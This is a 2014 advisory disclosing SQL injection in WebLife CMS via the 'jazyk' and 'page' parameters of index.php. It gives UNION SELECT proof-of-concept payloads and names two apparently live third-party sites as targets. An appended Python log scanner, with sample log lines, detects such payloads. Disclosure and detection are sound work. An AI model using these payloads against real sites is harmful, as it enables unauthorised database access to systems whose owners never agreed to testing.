WebLife CMS suffers from a remote SQL injection vulnerability.
# Multiple SQL Injection on WebLife CMS
# Risk: High
# CWE number: CWE-89
# Date: 09/04/2014
# Vendor: www.weblife.sk
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Windows 8 Pro
# Vulnerable File: index.php
# Exploit: http://host/index.php?jazyk=[SQLI]
# http://host/index.php?page=[SQLI]
# PoC:
- Target: www.arsstudionz.sk
- Vuln. File: /index.php?jazyk=
- Exploit: null+union+select 1,2,3,version(),5,6,7,8,9
- Target: www.nitriansketlaciarne.sk
- Vuln. File: /index.php?page=
- Exploit: null+union+select 1,2,version(),4,5,6,7,8,9
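
A defender-side check for the pattern in this advisory, as an added example that is not part of the original advisory: it scans web-server access log lines for UNION SELECT payloads in the `jazyk` and `page` parameters and groups hits by client address. The combined log format, the function names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

WATCHED_PARAMS = {"jazyk", "page"}  # parameters the advisory names
# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# UNION [ALL] SELECT, with whitespace or inline comments between the keywords.
GAP = r"(?:\s|/\*.*?\*/)+"
UNION_RE = re.compile(rf"\bunion{GAP}(?:all{GAP})?select\b", re.I | re.S)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Apr/2014:10:00:01 +0200] "GET /index.php?jazyk=sk&page=3 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Apr/2014:10:02:14 +0200] "GET /index.php?jazyk=null+union+select+1,2,3,version(),5,6,7,8,9 HTTP/1.1" 200 4810',
    '203.0.113.7 - - [09/Apr/2014:10:02:31 +0200] "GET /index.php?page=null%20UNION%20SELECT%201,2,version(),4,5,6,7,8,9 HTTP/1.1" 200 4790',
    '192.0.2.44 - - [09/Apr/2014:10:05:09 +0200] "GET /index.php?page=2&q=trade+union+select+committee HTTP/1.1" 200 5301',
]

def normalise(value, rounds=2):
    """Undo leftover layers of URL encoding and collapse whitespace."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).strip()

def scan_line(line):
    """Return [(param, value)] for watched parameters carrying UNION SELECT."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    hits = []
    # parse_qsl performs the first URL decode; normalise() handles any extra layer.
    for name, value in parse_qsl(urlsplit(m.group("target")).query):
        value = normalise(value)
        if name.lower() in WATCHED_PARAMS and UNION_RE.search(value):
            hits.append((name.lower(), value))
    return hits

def scan_log(lines):
    """Map client address -> list of (param, value) hits across all lines."""
    report = {}
    for line in lines:
        hits = scan_line(line)
        if hits:
            report.setdefault(line.split(" ", 1)[0], []).extend(hits)
    return report
```

A hit records an attempt, not a successful injection; only the two parameters named in the advisory are inspected, so the free-text `q` parameter in the last sample line does not trigger.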